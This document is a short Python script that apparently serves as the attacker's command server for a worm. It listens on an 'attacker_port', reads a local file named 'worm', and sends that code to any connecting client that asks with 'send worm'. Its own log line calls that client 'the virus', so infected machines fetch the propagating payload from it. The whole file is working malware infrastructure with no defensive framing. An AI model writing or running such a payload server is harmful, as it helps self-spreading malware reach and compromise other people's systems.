#!/usr/bin/env python3

import socket
import sys

if len(sys.argv) != 2:
    print("Usage:", sys.argv[0], "<attacker_port>")
    sys.exit(1)

IP = "0.0.0.0"
PORT = int(sys.argv[1])

with open("worm", "r") as w:
    worm = w.read()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((IP, PORT))
s.listen(5)

print(f"Server starts listening at {IP}:{PORT}")

while True:
    conn, addr = s.accept()
    with conn:
        print(f"{addr[0]}:{addr[1]} connected!")
        try:
            recv_data = conn.recv(1024)
            print("Recv:", recv_data.decode())
            if recv_data.decode() == "send worm":
                conn.send(worm.encode())
                print("The worm is sent to the virus!")
        except socket.error:
            print("Client disconnected.")

s.close()